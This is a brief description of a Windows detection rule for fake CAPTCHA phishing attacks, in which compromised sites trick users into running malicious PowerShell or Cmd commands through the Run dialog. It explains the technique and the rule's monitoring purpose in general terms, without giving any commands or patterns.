This detection rule identifies potential fake CAPTCHA phishing attacks which exploit the use of PowerShell or Cmd argument values. Attackers typically deploy this technique via compromised websites that use browser injections, masquerading as either erroneous CAPTCHA verifications or as legitimate error notices requiring user action to display a webpage. Victims are misled to input a malicious command into the Windows Run dialog box, potentially compromising their system. The rule actively monitors for processes initiated in the Windows environment that match specific command line patterns indicating the execution of potentially malicious scripts or commands related to CAPTCHA engagements.